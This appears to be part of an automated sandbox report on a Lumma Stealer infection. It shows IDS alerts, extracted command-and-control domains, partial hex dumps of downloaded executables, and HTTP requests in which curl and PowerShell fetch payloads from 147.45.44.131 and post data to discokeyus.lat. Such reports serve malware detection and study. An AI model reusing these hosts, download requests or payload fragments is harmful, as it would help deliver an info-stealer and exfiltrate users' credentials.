Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push esi	8_2_00427AD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ebx], ax	8_2_0041B2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push ebx	8_2_0043CA93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], cx	8_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_00428B61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_0042CB11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_0042CB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	8_2_0043F330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, eax	8_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, eax	8_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	8_2_00417380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	8_2_0041D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp al, 2Eh	8_2_00426B95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	8_2_00435450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	8_2_00417380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push 00000000h	8_2_00429C2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ecx], dx	8_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	8_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	8_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	8_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h	8_2_004385E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	8_2_004385E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]	8_2_00417DEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	8_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	8_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp dword ptr [0044450Ch]	8_2_00418591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-68h]	8_2_00428D93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then xor edi, edi	8_2_0041759F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [0044473Ch]	8_2_0041C653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, ebp	8_2_00425E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp dword ptr [004455F4h]	8_2_00425E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	8_2_0043AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then xor byte ptr [esp+eax+17h], al	8_2_00408F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], bl	8_2_00408F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	8_2_0042A700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [esi], al	8_2_0041BF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	8_2_00419F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [edx]	8_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edi], dx	8_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], cx	8_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, ebx	8_2_0042DFE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	8_2_0040BFFD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	8_2_0043EFB0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:60815 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.4:65307 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49739 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49738 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2859377 - Severity 1 - ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) : 192.168.2.4:49733 -> 147.45.44.131:80
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49745 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49740 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49736 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49743 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49741 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49750 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49738 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49743 -> 172.67.197.170:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 06:18:01 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 17 Dec 2024 20:57:01 GMTETag: "b200-6297d89e9c02c"Accept-Ranges: bytesContent-Length: 45568Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 bb 4b a7 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0c 00 00 00 00 00 00 ee c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c c3 00 00 4f 00 00 00 00 e0 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 80 c3 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 08 00 00 00 e0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c3 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 22 00 00 e8 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 1
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 06:18:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 17 Dec 2024 20:55:22 GMTETag: "49c00-6297d83faa710"Accept-Ranges: bytesContent-Length: 302080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 eb 03 00 00 10 00 00 00 ec 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 97 20 00 00 00 00 04 00 00 22 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 e1 00 00 00 30 04 00 00 50 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 88 38 00 00 00 20 05 00 00 3a 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /infopage/knhy.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/bnkh.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131

Source: Joe Sandbox View

IP Address: 147.45.44.131 147.45.44.131

Source: Joe Sandbox View	ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 172.67.197.170:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: discokeyus.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H0SN1JZ0BCB5ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18131Host: discokeyus.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U74AXY2RUBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8734Host: discokeyus.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HOFL2KSKOEIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20393Host: discokeyus.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JC8R6DT9XAQROPUHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1238Host: discokeyus.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LXVLWAQ0XJVMO2E3BHWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 549547Host: discokeyus.lat

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131

Source: global traffic	HTTP traffic detected: GET /infopage/bhgto.ps1 HTTP/1.1Host: 147.45.44.131User-Agent: curl/7.83.1Accept: /X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
Source: global traffic	HTTP traffic detected: GET /infopage/knhy.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/bnkh.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131

Source: global traffic	DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic	DNS traffic detected: DNS query: discokeyus.lat

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat

Source: powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1737453939.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1737453939.0000000005196000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131
Source: curl.exe, 00000004.00000002.1695078378.0000000003310000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/bhgto.ps1
Source: curl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/bhgto.ps1#f
Source: curl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/bhgto.ps1?g
Source: curl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/bhgto.ps1MgH
Source: curl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/bhgto.ps1Qf
Source: powershell.exe, 00000005.00000002.1737453939.00000000051B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/bnkh.exe
Source: powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/knhy.exe
Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
